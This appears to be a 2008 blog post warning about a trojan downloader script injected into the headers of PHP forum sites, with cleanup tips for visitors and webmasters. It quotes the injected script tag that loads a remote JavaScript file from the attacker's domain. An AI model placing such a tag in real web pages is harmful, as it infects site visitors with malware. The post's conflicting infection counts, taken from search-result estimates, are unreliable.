04 May 2008

Trojan Downloader Javascript infect more than 297.000 PHP Websites around the World

A friend site is infected and more than 32.800 (result depence how you search) more php based websites mostly on apache server hosted domains around the world with trojan downloader script!

Sample: trojan.jpg

ImageBanana - trojan.jpg


Google result Trojan Downloader Java script infected Domains:
http://www.google.com/search?q=%3Cscript+src%3D%22http%3A%2F%2Fxprmn4u.info%2Ff.js%22%3E%3C%2Fscript

this code someone inject into php forum sites in the header section
script src="http://xprmn4u.info/f.js

MS Windows Live OnCare found it!
Status of Nod32?

What to do as site visitor:
Close webbrowser
Delete / empty Java catch folder
delete / empty Web browser catch folder
reboot

Webmaster:
Save your server access log - analyse post requests to sql + more... source ip address,...

Update within 2h:
http://www.google.com/search?q=xprmn4u.info
Ergebnisse / Search Results 1 - 10 von ungefähr 370.000 für xprmn4u.info
Means about 370.000 Websites infected!!!

The Cross site Trojan Downloader Java Script is hosted by
UcoZ!


Its only 2 months ago as an iFrame-injection attack, redirected users to a malicious site with (ONLY) 165,000 Web sites infections... read more

0 comments:

Post a Comment

We would appreciate if you as readers of our blog, show us some feedback by signing up to this site with Friend Connect.
This will encourage us to publish updates in the future.

Archive

Dentoo.info - Hosting - Offering seedboxes and seedbox solutions

Connect

MoDs - BRD Push 2 Check Projects News all on one Page
Subscribe to rss feed! Powered By Blogger Creative Commons —
 Attribution-Noncommercial-No Derivative Works 1.0 Generic
GFC Accessibly Test

Site Stats Public Google Analytics stats

We respect your privacy. Your email address will never be shared with others.

My IP Address